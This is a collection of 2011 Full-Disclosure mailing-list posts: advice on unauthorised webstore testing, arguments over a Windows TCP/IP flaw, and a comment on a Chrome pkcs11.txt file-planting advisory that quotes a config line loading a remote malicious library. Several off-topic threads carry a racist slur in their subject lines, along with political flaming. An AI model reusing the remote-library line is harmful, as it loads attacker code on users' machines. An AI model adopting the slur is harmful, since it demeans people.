You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole 'or 1=1 thing. So your approach to the client is all he would need to contact authorities if he so chose. Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it. Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes Sent: Wednesday, November 30, 2011 2:56 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Client aproach Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
You mad bro? If by mad you mean crazy, well, you're not the only one asking that question these days :) If by mad you mean angry, then I'd have to say yes. Well, angry is too strong a term - I would say frustrated. Information Security is supposed to be about just that - but we've stopped talking about that. We talk about information *insecurity*. What frustrates me is that everyone thinks there is some value to pointing out how bad everyone else's mistakes are, yet it doesn't seem like anyone is actually suggesting ways of fixing things. I could go on, but I think I said it best here: http://syngress.com/phishwrap/july-2011-phishwrap/security-theater/ t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Yeah, I gotta say, I'm going to use it at some point ;) From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mario Vilas Sent: Friday, November 11, 2011 9:02 AM To: Ryan Dewhurst Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516) I liked the heavy breather in the perv closet bit. On Fri, Nov 11, 2011 at 5:43 PM, Ryan Dewhurst ryandewhu...@gmail.commailto:ryandewhu...@gmail.com wrote: I think Jon just said what everyone else was thinking, he said what I was thinking at least. On Fri, Nov 11, 2011 at 1:54 PM, Jon Kertz jon.ke...@gmail.commailto:jon.ke...@gmail.com wrote: On Thu, Nov 10, 2011 at 2:59 PM, xD 0x41 sec...@gmail.commailto:sec...@gmail.com wrote: About the PPS, i think thats a very bad summary of the exploit, 49days to send a packet, my butt. There is many people assuming wrong things, when it can be done with seconds, syscanner would scan a -b class in minutes, remember it only has to find the vulns, gather, then it would break scan, and trigger vuln... so in real world botnet, yes then, with tcpip patchers, like somany ppl i know myself, even use (tcpipz)patcher ) , wich rocks... and it is ONLY one wich actually works, when you maybe modify the src so the sys file, is dropped from within a .cpp file, well thats up to you but thats better way to make it work, this will open sockets/threads, as i could, easily proove with one exe, but, the goal is, to trigger the vuln then exploit it, less than 49days :P , so , iguess if this exploit, in real form, gathered 2 million hosts over 3 nights.. i guessing that the exploit, could possibly be triggered with ONE properly setup packet.. people forget that, a packet is one thing, and a crafted UDP packet, is quite another.. I'd really like to see you actually explain this bug with code. Either with a poc or with the disassembly. You seem to act like you know what's going on, but so far your description has been off base (from what I can make of your writing). No one cares about paragraphs of speculation and bragging, code or you are just another heavy breather in the perv closet of FD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
So, I've looked about on the web to see what software of any consequence you have written, but I can't find any. Can you point me to anything that illustrates that you know how to develop wide scale software applications and execute an SDL plan, or do you just like to sit back and bitch about everyone else without actually doing anything? I'm serious - I'd really like to know. Over all these years, all I've ever seen from you is talk about how stupid everyone else is, but I've never once actually seen you do anything constructive. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, November 10, 2011 8:48 AM To: xD 0x41 Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516) On Thu, Nov 10, 2011 at 08:46:44AM +1100, xD 0x41 wrote: You could just google for IRC packs of win2k src ;) I know i have a copy of it somewhere... acvtually tho, would not be helpful tho, as it does not affect win2k.. so i guess there would be some code there but not the code you want. @george and, ideally if 'years' ago existed for this exploit but, it does only affect v6 and up , this is tested so xp/2k/2k3 not affected... still, i know people are using other ways anyhow , and thats just how botting is... one way dies, one takes its place :s i guess we wait for the rls of this.. maybe! as in real life, real bugs die (the imaginary case is not clear to me). i suppose trustworthy computing doesn't mean not many bugs still alive. -- j ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)
Fake :) From: Sergito [mailto:sergito.li...@gmail.com] Sent: Thursday, November 10, 2011 11:50 AM To: Thor (Hammer of God) Cc: Georgi Guninski; xD 0x41; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516) PoC ? http://www.youtube.com/watch?v=4aBE6o0oDlo []'s Sergito 2011/11/10 Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com So, I've looked about on the web to see what software of any consequence you have written, but I can't find any. Can you point me to anything that illustrates that you know how to develop wide scale software applications and execute an SDL plan, or do you just like to sit back and bitch about everyone else without actually doing anything? I'm serious - I'd really like to know. Over all these years, all I've ever seen from you is talk about how stupid everyone else is, but I've never once actually seen you do anything constructive. t -Original Message- From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, November 10, 2011 8:48 AM To: xD 0x41 Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516) On Thu, Nov 10, 2011 at 08:46:44AM +1100, xD 0x41 wrote: You could just google for IRC packs of win2k src ;) I know i have a copy of it somewhere... acvtually tho, would not be helpful tho, as it does not affect win2k.. so i guess there would be some code there but not the code you want. @george and, ideally if 'years' ago existed for this exploit but, it does only affect v6 and up , this is tested so xp/2k/2k3 not affected... still, i know people are using other ways anyhow , and thats just how botting is... one way dies, one takes its place :s i guess we wait for the rls of this.. maybe! as in real life, real bugs die (the imaginary case is not clear to me). i suppose trustworthy computing doesn't mean not many bugs still alive. -- j ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
*Any* assumptions that presuppose security based on social affiliation need to be reconsidered. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Monday, October 24, 2011 9:32 AM To: Travis Biehn Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers On Mon, 24 Oct 2011 11:53:02 EDT, Travis Biehn said: So they put up a fake network, 'hacked' most of the nodes, and with complete control of their dummy network they were able to figure out traffic movement? This is news why? It's not news - it's *long* been known that Tor would be breakable if somebody pwned a sufficient percentage of the nodes. It's been regarded as a mostly theoretical attack, because the sort of people that run Tor have up to now been the paranoid type that tend to secure their systems better. The only part of *news* in it was this: Researchers showed that one third of the nodes are vulnerable, So maybe the people who run Tor are more paranoid assumption is flawed and needs to be reconsidered. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Chrome pkcs11.txt File Planting
For what it's worth, I found this article to be far more matter of fact in regard to the general concept, the existing (default) conditions in play, and the conditions which need to be in place (or manipulated) in order for this to be exploited than some of the other material your company has presented in the past.Noting it may or may not be a vulnerability shows some research maturity and business intelligence on your part, and was actually refreshing. When researchers spend too much time painting dire pictures of impact based on (what is typically) non-standard or exaggerated exposure scenarios, the actual message in the research is lost. In this case, developers can very easily see how including features that support functions such as library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib is a really bad idea. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of ACROS Security Lists Sent: Friday, October 21, 2011 2:07 AM To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk; c...@cert.org; si-c...@arnes.si Subject: [Full-disclosure] Google Chrome pkcs11.txt File Planting A month ago our company notified Google about a peculiar behavior of Chrome browser that can be exploited for execution of remote code outside Chrome sandbox under specific conditions. Our new blog post describes it all. http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file- planting.html or http://bit.ly/olK1P9 Enjoy the reading! Mitja Kolsek CEOCTO ACROS, d.o.o. Makedonska ulica 113 SI - 2000 Maribor, Slovenia tel: +386 2 3000 280 fax: +386 2 3000 282 web: http://www.acrossecurity.com blg: http://blog.acrossecurity.com ACROS Security: Finding Your Digital Vulnerabilities Before Others Do ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
I don't think I have any mental deficiency, but I've certainly done things that almost got me a Darwin Award. I think momentary lack of reason better describes it. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Paul Schmehl Sent: Monday, October 17, 2011 8:32 AM To: valdis.kletni...@vt.edu; noloa...@gmail.com Cc: full-disclosure Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD --On October 17, 2011 9:03:21 AM -0400 valdis.kletni...@vt.edu wrote: On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. OTOH, don't you think someone who qualifies for a Darwin Award has demonstrated a mental deficiency? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
He already talks about how he's already thought about that in a prior article: http://gawker.com/5850025/right+wing-rabble+rouser-leaks-thousands-of-occupy-wall-street-emails -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of Jeffrey Walton Sent: Sunday, October 16, 2011 4:05 PM To: Ivan . Cc: full-disclosure Subject: Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote: http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall- street-to-the-fbi-and-nypd Thomas Ryan is definitely not the brightest fellow in computer security: We have been heavily monitoring Occupy Wall Street, and Anonymous. Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address.
Haven't we made it to the point where top posting is OK? I mean, it works from a Ped Xing standpoint, why not here? It is REALLY that bad? -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Friday, October 14, 2011 7:41 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address. If you guys are going to continue your little flame war, would you at *least* trim the non-relevant parts of the mail you're replying to? And at least be *creative* in your flaming, m'kay? Oh, and quit top-posting. (And the person who wanted more pink bits - if you can't find free pr0n on the internet on your own, you're obviously *waaay* too young to be posting on this list) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Colorado empties popular lake to pay its water bill http://www.telegraph.co.uk/news/worldnews/northamerica/usa/8816656/ Col orado-empties-popular-lake-to-pay-its-water-bill.html and so on. Your tax $$$ go to bailouts Are these links true? Things might be worse than i suspected (no matter what vagina-americans bitch about the crisis). Do you really care if they are true or not? Reality has not stopped you from sharing your racist, elitist, know-it-all opinions before. Why start now? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
I saw this on FB and thought I would pass it along: http://99percentexif.tumblr.com/ It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: Wednesday, October 12, 2011 12:45 AM To: noloa...@gmail.com Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules Regarding who's doing the most damage to US economy, I'll just say I won't comment. I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites. On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.commailto:noloa...@gmail.com wrote: On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.commailto:uuf6...@gmail.com wrote: Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! Its not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US). One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1]. Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations. Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10. Jeff [1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.commailto:noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.commailto:d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. The last tine I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm [SNIP] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check. And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
No, it goes to show you how much most of the people bitching about all of this are full of shit, as per the oldie but goodie Holiday in Cambodia by the Dead Kennedy's. The people who REALLY need help are not the ones sitting around all day posting shite on the internet. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of David Alanis Sent: Wednesday, October 12, 2011 10:21 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules Quoting Thor (Hammer of God) t...@hammerofgod.com: I saw this on FB and thought I would pass it along: http://99percentexif.tumblr.com/ It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post. t To me this goes to show right wing absurdity and the length they go feed propaganda to the Fox News sheeople/believers. What is the logic of the tumbler page anyway!? If you protest against rich filthy thieves you mustn't own a semi decent camera? Its not a right but a privilege to own a nice camera, now. This message was sent using IMP, the Internet Messaging Program. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Well, you said nor do I care so I too am confused. However, since you did ask, there is an important aspect to your retort that you seem ok with dancing over, and that is the fact the taxing millionaires and billionaires would be *additional* taxes. Mine won't go down, and in fact, will probably go up. And I guarantee, without question and as definitely as the sun will rise tomorrow, when whatever x population is taxed more, and whatever resolution these people think will come from all of this noise, that they will CONTINUE to bitch and moan when other people have more than they do. The premise of I am the 99% or your use of average is specious. Average what? Income? No, that can't be it. Education? No, that's clearly not it. Average tax payer? Certainly not. Average person bitching about how they don't have what they want and think it should magically be given to them? Well, that's more like it, isn't it? The entire movement is a waste of time, and the let them eat cake-ers will find that out, as they always do, when they become the ones that have to start baking. The reason I posted the link is because it's freaking FUNNY to call out the ME-TOO'S! Now if you'll excuse me, I must get back to my job so that I can try to afford the taxes taken out. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of David Alanis Sent: Wednesday, October 12, 2011 12:19 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules Quoting Thor (Hammer of God) t...@hammerofgod.com: No, it goes to show you how much most of the people bitching about all of this are full of shit, as per the oldie but goodie Holiday in Cambodia by the Dead Kennedy's. The people who REALLY need help are not the ones sitting around all day posting shite on the internet. I don't know where you're getting at or what political stance you take nor do I care. If you don't think the people who are protesting against the greed of wall street are average Americans, then you need help. Tell us then, since you cared enough to post a link trying to discredit the anti- wall-street movement based on exifs. Who are the people who need the help? Corporations? Cause I've heard opposing arguments by *average* Americans that corporations are people. Last time I checked, Obama's Job Act gives even more tax breaks to companies and extends unemployment benefits to *Americans* with out jobs by taxing millionaires and billionaires. You have me confused. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of David Alanis Sent: Wednesday, October 12, 2011 10:21 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules Quoting Thor (Hammer of God) t...@hammerofgod.com: I saw this on FB and thought I would pass it along: http://99percentexif.tumblr.com/ It's the exif data from the photos the 99%'ers are posting - showing the $1000 systems, cameras, and software they are using to post. t To me this goes to show right wing absurdity and the length they go feed propaganda to the Fox News sheeople/believers. What is the logic of the tumbler page anyway!? If you protest against rich filthy thieves you mustn't own a semi decent camera? Its not a right but a privilege to own a nice camera, now. This message was sent using IMP, the Internet Messaging Program. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This message was sent using IMP, the Internet Messaging Program. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Or people who think they are better because of the color of their skin. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Darren Martyn Sent: Monday, October 10, 2011 3:29 AM To: Christian Sciberras Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules We all are guilty, that is true. I can admit to that. Though what I intensely dislike are those who think they are better than us - because they are more successful at being greedy pigs. On Mon, Oct 10, 2011 at 9:54 AM, Christian Sciberras uuf6...@gmail.commailto:uuf6...@gmail.com wrote: He who believes the 99% are not guilty of greed is a downright fool. The 1%? I don't care. Honestly, I don't. Fun quote (from the 99% crowd): Why does the 1% deserve a Ferrari and I don't?! On Mon, Oct 10, 2011 at 10:43 AM, Darren Martyn d.martyn.fulldisclos...@gmail.commailto:d.martyn.fulldisclos...@gmail.com wrote: The day may come when Wall Street is finally silent, the slowly rotting carcasses of the power hungry elites swinging silently from the trees in Central park, the lynch mob finally satiated... But will anything change? Greed will always exist, there will always be those who think they can get away with this kind of thing. Funny how it finally has the President interested, maybe we can have change now? On Thu, Oct 6, 2011 at 7:54 PM, Jeffrey Walton noloa...@gmail.commailto:noloa...@gmail.com wrote: On Thu, Oct 6, 2011 at 1:21 PM, Georgi Guninski gunin...@guninski.commailto:gunin...@guninski.com wrote: American people understand that not everybody's been following the rules, he said. These days, a lot of folks doing the right thing are not rewarded. A lot of folks who are not doing the right thing are rewarded. From the article: : President Obama on Thursday called the Occupy Wall : Street protests a reflection of a broad-based frustration : about how our financial system works and pledged to : continue fighting to protect American consumers. I seem to recall what Obama said at a banker's luncheon after he took office (to paraphrase): My administration is the only thing saving you from the pitchforks of the American people. It seems to me he took great pride in the protection he provided to the economic terrorists. I hope he chokes on the money the industry is stuffing in his pockets. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: Monday, October 10, 2011 7:05 AM To: Michael T Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.commailto:mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.commailto:uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back”
Just look at the replies on FD as well – people saying “most likely means A,B,C” and “probably this or that” where they have absolutely no basis for making such statements. People “want” this to be the case, and are more than willing to simply accept any such claim as gospel. I would have to say that the article did precisely what it was designed to do: generate hits to drive membership and ads. Oh, and I was wrong – the source wasn’t “someone close” it was “a source familiar with the network infection” which could be you or me at this point, or the copy repair-person. I’m familiar with it. So are you. These “articles” are attractive because the author can say what they want based on interpretation of conversations with the “unknown and never-to-be-revealed” contact. If people can’t back up what they are saying, or when the entire validity of an article is based on the word of “someone speaking on terms of anonymity” then there’s really not much value in it. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Monday, October 10, 2011 11:23 AM To: Thor (Hammer of God) Cc: Michael T; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” Since it very much discredits and puts the AA to shame, isn't it quite plausible that some department's lawyers fall over this guy's claims? Maybe the article has been written specifically for people to draw the wrong conclusion - happens too often - but still... On Mon, Oct 10, 2011 at 7:36 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Consider the source. It’s “someone close” to the operations, and that only according to this guy. It could very well be a slot-puller in the casino across the street… I’m always dubious of the reporting of this type of thing where the source is some “secret” person, and where there is never any ability to refute claims. t From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: Monday, October 10, 2011 7:05 AM To: Michael T Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] “We keep wiping it off, and it keeps coming back” I'm talking more about their engineers than their network. If I had my network infected with a virus, I'd immediately deploy some form of logging/monitoring tool (eg, wireshark). Honestly, it all sounds like they're employing inexperienced engineers. Which is again strange, considering the field they're in. Regarding your bet, see that's already something. Why exactly can't they verify your bet? It isn't like viruses suddenly became invisible, is it? I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. On Mon, Oct 10, 2011 at 3:40 PM, Michael T mt2410...@gmail.commailto:mt2410...@gmail.com wrote: It's a network that's 'detached', or 'segregated', or whatevered from the rest of the world, so it's 'largely immune to viruses'. That likely means they have: 1. NO logging 2. NO anti-virus 3. NO hardening The very fact that these systems are on a segregated network means they are probably more frail, and more susceptible to viruses, than a normal person's laptop. Immune to viruses... What a crock of shit. My bet is that it's coming from the planes. Mike On Mon, Oct 10, 2011 at 7:51 AM, Christian Sciberras uuf6...@gmail.commailto:uuf6...@gmail.com wrote: http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/ This is news to me. Moreover, I'm a bit confused as to how they don't track how it's coming back. I mean, how is it possible that no one stepped in and analyzed how the virus acts and where it came from? It sounds fish if you ask me. Chris. ___ Full-Disclosure - We believe in it. 